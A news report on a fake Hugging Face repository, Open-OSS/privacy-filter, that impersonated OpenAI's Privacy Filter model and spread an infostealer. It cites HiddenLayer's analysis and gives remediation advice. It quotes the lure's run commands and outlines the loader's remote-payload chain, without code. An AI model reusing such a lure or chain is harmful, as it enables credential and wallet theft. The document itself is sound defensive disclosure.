Fake OpenAI Privacy Filter downloaded 244K

HiddenLayer said on May 7 that it found malicious code in a Hugging Face repository called Open-OSS/privacy-filter that impersonated OpenAI's legitimate Privacy Filter model and delivered infostealer malware to users who ran its files. The security firm said the repository copied OpenAI's model card almost verbatim and climbed into Hugging Face's trending listings before the platform removed it. Hugging Face's documentation says the platform scans repository files for malware on each commit and warns users when files are flagged as unsafe. OpenAI's real model, published under the openai/privacy-filter namespace, remains live on Hugging Face. ### Which repository was fake, and what was it imitating? Open-OSS/privacy-filter was the repository HiddenLayer identified as malicious, according to the firm's May 7 report. HiddenLayer said the project typosquatted OpenAI's legitimate privacy-filter release and copied the authentic model page's text closely enough to look credible to developers browsing Hugging Face. (hiddenlayer.com) OpenAI's official page is hosted as openai/privacy-filter on Hugging Face. That model is described there as a token-classification system for detecting and masking personally identifiable information in text, with example code showing standard Transformers loading commands. ### How far did the fake model spread before it was removed? HiddenLayer said the malicious repository reached the No. 1 trending position on Hugging Face with about 244,000 downloads and 667 likes in under 18 hours. (hiddenlayer.com) The firm said those numbers were "almost certainly artificially inflated" to make the repository appear legitimate, an assessment attributed to HiddenLayer's researchers. (huggingface.co) BleepingComputer, citing HiddenLayer, also reported that the repository briefly reached the top spot on Hugging Face before the platform responded to reports and removed it. Hugging Face's public documentation does not describe this specific incident, but it does say repositories are scanned for malware and can be marked unsafe if suspicious files are detected. (hiddenlayer.com) ### What did the malicious files do on a victim's machine? HiddenLayer said the fake repository's README told users to clone the project and run `start.bat` on Windows or `python loader.py` on Linux and macOS. The firm's analysis said the `loader.py` script first displayed decoy behavior and then called a function that disabled SSL verification, decoded a remote URL and fetched a command payload. (bleepingcomputer.com) The May 7 report said the malware chain ultimately deployed an infostealer on Windows machines. HiddenLayer said affected users should treat the host as fully compromised if they executed files from the repository on Windows, and the firm recommended reimaging the system rather than attempting cleanup. ### Who was most at risk from the download? (hiddenlayer.com) Windows users who cloned Open-OSS/privacy-filter and executed `start.bat`, `python loader.py`, or other repository files faced the clearest risk, HiddenLayer said. The firm said victims should assume saved passwords, session cookies, OAuth tokens, SSH keys, Discord tokens and cryptocurrency wallet data may have been stolen. (hiddenlayer.com) HiddenLayer said users should isolate affected machines, avoid logging into accounts from those systems, rotate credentials stored on the host and move cryptocurrency funds to wallets created on clean devices. Those steps came from the firm's published response guidance for anyone who ran the repository's files. ### What does Hugging Face say about its defenses? (hiddenlayer.com) Hugging Face says in its security documentation that it runs every repository file through a malware scanner and triggers scanning on each commit. The company says repositories with unsafe files can display warnings to users until suspicious content is removed. The platform's live page for OpenAI's official privacy-filter model shows a separate, legitimate repository under OpenAI's verified namespace. (hiddenlayer.com) That page includes usage examples and model details that HiddenLayer said the fake repository copied as part of the lure. ### Where can affected users check next? HiddenLayer published indicators of compromise and response guidance in its May 7 report on the Open-OSS/privacy-filter repository. (huggingface.co) Hugging Face's security documentation also describes how unsafe files are labeled on the platform, while OpenAI's official model page remains the reference point for the legitimate privacy-filter release. (hiddenlayer.com) (huggingface.co)